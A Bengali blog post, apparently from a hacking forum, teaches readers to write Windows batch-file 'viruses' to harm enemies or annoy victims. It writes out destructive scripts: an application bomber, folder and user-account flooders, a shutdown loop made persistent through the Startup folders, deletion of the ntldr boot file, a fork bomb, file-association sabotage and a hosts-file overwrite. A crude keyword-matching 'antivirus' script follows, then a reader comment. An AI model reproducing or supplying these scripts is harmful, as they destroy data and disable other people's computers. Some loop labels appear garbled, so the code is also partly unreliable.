এই পোস্ট এ আমি আপনাদেরকে অন্য কোন সাইট থেকে বা নিজের লেখা ভাইরাস স্ক্রিপ্ট দিয়ে বলতে পারতাম এটি .bat নামে সেভ করুন । আর ভাইরাস বানান আপনার শত্রুকে ধ্বংস করে দিন । কিন্তু এতে আপনি এর গুরুত্ব কতটা বুঝতে পারতেন ? এভাবে আরেকজনের থেকে কপি করে লাভ ই বা কি ??? তাই আমি আপনাদের বলব batch file এর সাতকাহন । তাতে আপনি নিজেই কম্যান্ড দিয়ে ভাইরাস স্ক্রিপ্ট , এন্টিভাইরাস স্ক্রিপ্ট লিখতে পারবেন ।
এখানে আমি কোন স্ক্রিনশট দেব না কারন আমি নিজেও অনেক সাইট পড়ে এবং অভিজ্ঞতা থেকে এটি লিখছি ...............
What are Batch Files ?
একটা উদাহরণ দিয়ে শুরু করা যাক । star থেকে রান এ গিয়ে cmd ওপেন করুন । এখন আপনার ডাইরেক্টরি "Desktop" থেকে সরাতে "Cd Desktop" টাইপ করুন উদ্ধরন চিহ্ন ছাড়া । এখন নিচের তিনটি কম্যান্ড এক এক করে লিখুন ।
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
লক্ষ্য করুন আমরা কি করলাম । প্রথমে x ফোল্ডার তৈরি করলাম । এরপর এর ভেতরে গিয়ে y ফোল্ডার তৈরি করলাম। এরপর x ডিলিট করে দিলাম ।
এখন এই কাজ টাই একটু অন্য ভাবে করুন । এগুলকে নিয়ে নোটপ্যাড এ কপি করে সেভ করুন । নাম এর শেষ এ .bat থাকতে হবে ।
তাহলে দেখবেন উপরে বর্ণিত কাজ টা হবে ।
তাহলে বোঝা গেল batch হচ্ছে এমন ধরনের ফাইল টাইপ যা হল তার মধ্যে দেয়া কম্যান্ড গুলকে অনুসরন করে কাজ করে । আপনি হয়তবা মনে করবেন Malware বা ছোট Trojan বানান খুব কঠিন । সেরকম না । কিন্তু যে বানাবে তার মানসিকতাই আসল
What can batch viruses do ?
প্রশ্ন হল এদের দিয়ে কি কি কাজ করা যায় ??
এদের দিয়ে অনেক কাজ করা যায় যেমন ধরুন ডাটা ডিলিট করা। ড্রাইভ ফরমেট , তথ্য চুরি , ভাইরাস ইঞ্জেক্ট, পারফর্মেন্স বাধা গ্রস্থ করা । খামাকা মানুষ কে বিপদে ফেলা এসব............
এখন কিছু উদাহরণ প্র্যাকটিস করা যাক। নিচের কোড গুলো পিসিতে সেভ করে দেখুন ।
1. Application Bomber
@echo off
// It instructs to hide the commands when batch files is executed 😡 //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
প্রথমে আপনাকে
@echo off দিয়ে ফাইল কে অন্য ফাইল থেকে আলাদা করতে হবে । এরপর এই সব একসাথে বা আলাদা আলাদাভাবে নোটপ্যাড এ লিখে .bat দিয়ে যে কোন নামে সেভ করুন । এগুলো ক্ষতিকর না । আপনি ওপেন করতে পারেন । তবে এভাবেই কমান্ড কম্বাইন্ড করে victim কে বিরক্ত করা হয় ।
2. Folder flooder
😡
md %random% // makes directory/folder.
goto x
%random% এর মাধ্যমে বলা হয়েছে যে কোন ধনাত্মক সংখ্যা প্রিন্ট করতে । যার ফলে এটি ওপেন করলে যে কোন ড্রাইভ এ এটি ফোল্ডার বানাতেই থাকবে । এটি পিসিতে ওপেন করবেন না ।
3.User account flooder
😡
net user %random% /add //create user account
goto x
এটি যেকোনো নাম্বার বসিয়ে উইন্ডোজ এ ইউযার account তৈরি করতে থাকবে
4.Shutdown Virus
shutdown -s -t 00 //
এই কোড এর মাধ্যমে পিসি সাথে সাথে বন্ধ হয়ে যাবে । মনে হবে হার্ডডিস্ক ফেইল করেছে
কিন্তু এটি একবার এই হবে আপনি যদি এটি চালু রাখতে চান তবে “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup” এবং “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”তে পেস্ট করতে হবে । যার ফলে পিসি ছাড়া হলে বারবার এটি হতে থাকবে । আপনাকে আই দুই ডিরেক্টরি থেকে ফাইল দিলিট করে এটি বন্ধ করতে হবে ।
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
এখন 'Show hidden files and folders'. এ চেক দিয়ে বের হয়ে আসুন । এখন আপনি অপারেটিং সিস্টেম এর ফাইল দেখতেও পাবেন । 'ntldr' নামে একটি ফাইল আছে যা উইন্ডোজ এর বূট নিয়ন্ত্রন করে . এখন একে ডিলিট করতে একটা ব্যাচ ফাইল বানাব
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
এটি রান করার সাথে সাথে ফাইল টি ডিলিট হয়ে যাবে । আপনি নিজের পিসি তে এটি রান করবেন না ।
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
এই কোড ফাইল ম্যানেজার কে বলবে গুন হতে । যার ফলে আপনার অজান্তে পিসিতে ক্যাশ মেমরি বেড়ে যাবে শেষ এ পিসি হ্যাঁ ং হবে
6. Extension Changer
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
প্রতটি ফাইল এর আলাদা ফরমেট আছে যেমন .exe, .jpeg, .mkv ইত্যাদি । এই কোড চালাবার সাথে সাথে সব ফরমেট ও লট পালট হয়ে যাবে এবং । প্রোগ্রাম রি ইন্সটাল করতে হবে । তাই অন্তত পিসি তে এটি চলাবেন না ।
7. DNS Poisoning
আপনার উইন্ডোজ এ ‘hosts’ নামে ফাইল আছে এখানে c:\windows\system32\drivers\etc. আমরা এখানে একটি আইপি এবং ওয়েবসাইট বসিয়ে দিতে পারি . তাহলে আমাদের ব্রাউযার সেই ওয়েবসাইট এ আমাদের নিয়ে যাবে .
echo xxx.xxx.xxx.xxx
http://www.anything.com > C:\windows\system32\drivers\etc\hosts //
এই কম্যান্ড তাহলে আইপি এবং ওয়েবসাইট কে host এ প্রিন্ট করবে
xxx.xxx.xxx.xxx এবং
http://www.anything.com এ আপনার কাঙ্খিত আইপি এবং ওয়েবসাইট বসাবেন । এরফলে যে এটি ওপেন করবে সে সেই সাইট ছাড়া তার ব্রাউযার অন্য সাইট দেখতে পাবেনা ।
Limitations of Batch Viruses -:
কিন্তু কিছু সমস্যা আছে ...............
যে কেউ এটি ওপেন না করে নোট প্যাড দিয়ে ভিউ করতে পারে । যার ফলে সে সতরক হয়ে যাবে ।
এটি ভাইরাস হলে আন্টিভাইরাস ও উইন্ডোজ AlaRt দেবে । এর সমাধান আছে ।
কিন্তু আমি বলছি না । খারাপ পারপাসে ব্যাবহার হতে পারে ।
একটা অফ টপিক । ভাল না লাগলে এড়িয়ে যান 😛 এ পর্যন্ত যারা আমার বকবক শুনেছেন তাদের ধারনা হয়েছে এগুলো দিয়ে শুধু আযেবাযে কাজ করা যায় । তা না ......
আমি একটা ছোটখাটো batch antivirus এর কো ড করেছি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
এটি আপনার পিসি তে zekono kichu .bat নামে সেভ করুন । এটিতে আপনি যে কোন .bat ফাইল এর নাম লিখে স্ক্যান করতে পারবেন ।
শেষ কথাঅনেক কিছু বললাম । আপনাদের মতামত জানাবেন ।
চলে আসুন কথা হবে এখানে https://www.facebook.com/CY133R
আর আমি তো আছিই এখানে https://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
..............................................................10%3InfiniTY.............................................................................
Thanks vai….Darun ekta post…..onk sundor hoyaca…….ami apnar phone number ta chai…plz ektu daya jabay…..plz………my mail is [email protected]